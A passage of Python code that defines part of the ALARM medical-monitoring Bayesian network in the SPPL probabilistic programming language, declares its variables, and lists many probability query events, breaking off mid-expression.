        CO ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
if (CO == 'LOW'):
    if (TPR == 'LOW'):
        BP ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(TPR == 'NORMAL'):
        BP ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        BP ~= choice({'LOW' : 0.3, 'NORMAL' : 0.6, 'HIGH' : 0.10000000000000009})
elif(CO == 'NORMAL'):
    if(TPR == 'LOW'):
        BP ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(TPR == 'NORMAL'):
        BP ~= choice({'LOW' : 0.1, 'NORMAL' : 0.85, 'HIGH' : 0.050000000000000044})
    else:
        BP ~= choice({'LOW' : 0.05, 'NORMAL' : 0.4, 'HIGH' : 0.55})
else:
    if(TPR == 'LOW'):
        BP ~= choice({'LOW' : 0.9, 'NORMAL' : 0.09, 'HIGH' : 0.010000000000000009})
    elif(TPR == 'NORMAL'):
        BP ~= choice({'LOW' : 0.05, 'NORMAL' : 0.2, 'HIGH' : 0.75})
    else:
        BP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.09, 'HIGH' : 0.9})
'''
compiler = SPPL_Compiler(data)
namespace = compiler.execute_module()
model = namespace.model
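# Handles for referencing each network variable in the events and queries below.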
ANAPHYLAXIS = Id('ANAPHYLAXIS')
ARTCO2 = Id('ARTCO2')
BP = Id('BP')
CATECHOL = Id('CATECHOL')
CO = Id('CO')
CVP = Id('CVP')
DISCONNECT = Id('DISCONNECT')
ERRCAUTER = Id('ERRCAUTER')
ERRLOWOUTPUT = Id('ERRLOWOUTPUT')
EXPCO2 = Id('EXPCO2')
FIO2 = Id('FIO2')
HISTORY = Id('HISTORY')
HR = Id('HR')
HRBP = Id('HRBP')
HREKG = Id('HREKG')
HRSAT = Id('HRSAT')
HYPOVOLEMIA = Id('HYPOVOLEMIA')
INSUFFANESTH = Id('INSUFFANESTH')
INTUBATION = Id('INTUBATION')
KINKEDTUBE = Id('KINKEDTUBE')
LVEDVOLUME = Id('LVEDVOLUME')
LVFAILURE = Id('LVFAILURE')
MINVOL = Id('MINVOL')
MINVOLSET = Id('MINVOLSET')
PAP = Id('PAP')
PCWP = Id('PCWP')
PRESS = Id('PRESS')
PULMEMBOLUS = Id('PULMEMBOLUS')
PVSAT = Id('PVSAT')
SAO2 = Id('SAO2')
SHUNT = Id('SHUNT')
STROKEVOLUME = Id('STROKEVOLUME')
TPR = Id('TPR')
VENTALV = Id('VENTALV')
VENTLUNG = Id('VENTLUNG')
VENTMACH = Id('VENTMACH')
VENTTUBE = Id('VENTTUBE')
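# Hedged usage sketch (assumes the sppl SPE API's condition()/logprob(),
# as provided by the imports above; the particular query is illustrative):
posterior = model.condition(HYPOVOLEMIA << {'TRUE'})
print('logP(BP=LOW | HYPOVOLEMIA=TRUE) =', posterior.logprob(BP << {'LOW'}))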
events = [VENTLUNG << {'LOW'},CATECHOL << {'HIGH'},PRESS << {'ZERO'},ARTCO2 << {'NORMAL'},VENTALV << {'ZERO'},INSUFFANESTH << {'FALSE'},HYPOVOLEMIA << {'TRUE'},LVFAILURE << {'FALSE'},SHUNT << {'HIGH'},PRESS << {'HIGH'},VENTMACH << {'HIGH'},PRESS << {'HIGH'},HYPOVOLEMIA << {'TRUE'},VENTTUBE << {'LOW'},DISCONNECT << {'TRUE'},BP << {'HIGH'},PVSAT << {'LOW'},HISTORY << {'TRUE'},BP << {'NORMAL'},HREKG << {'NORMAL'},SHUNT << {'HIGH'},INTUBATION << {'ESOPHAGEAL'},PRESS << {'ZERO'},INSUFFANESTH << {'TRUE'},VENTLUNG << {'LOW'},CATECHOL << {'HIGH'},HISTORY << {'FALSE'},PCWP << {'NORMAL'},BP << {'HIGH'},HR << {'LOW'},MINVOL << {'LOW'},INTUBATION << {'ONESIDED'},CATECHOL << {'NORMAL'},LVFAILURE << {'FALSE'},MINVOLSET << {'NORMAL'},MINVOL << {'NORMAL'},DISCONNECT << {'TRUE'},VENTALV << {'HIGH'},CATECHOL << {'HIGH'},ANAPHYLAXIS << {'TRUE'},ERRLOWOUTPUT << {'FALSE'},HR << {'LOW'},HISTORY << {'TRUE'},MINVOLSET << {'LOW'},HISTORY << {'TRUE'},INSUFFANESTH << {'FALSE'},ERRCAUTER << {'FALSE'},CATECHOL << {'HIGH'},PCWP << {'NORMAL'},PRESS << {'ZERO'},(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'LOW'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'LOW'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 
<< {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'HIGH'}) & (PCWP << {'LOW'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'NORMAL'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'LOW'}) & (HRBP << {'HIGH'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << 
{'HIGH'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'HIGH'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'HIGH'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'LOW'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'HIGH'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & 
(PAP << {'NORMAL'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'HIGH'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'HIGH'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'NORMAL'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'HIGH'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) 
& (MINVOL << {'ZERO'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'HIGH'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'NORMAL'}) & (PCWP << {'NORMAL'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'NORMAL'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'HIGH'}) & (HREKG << {'LOW'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME 
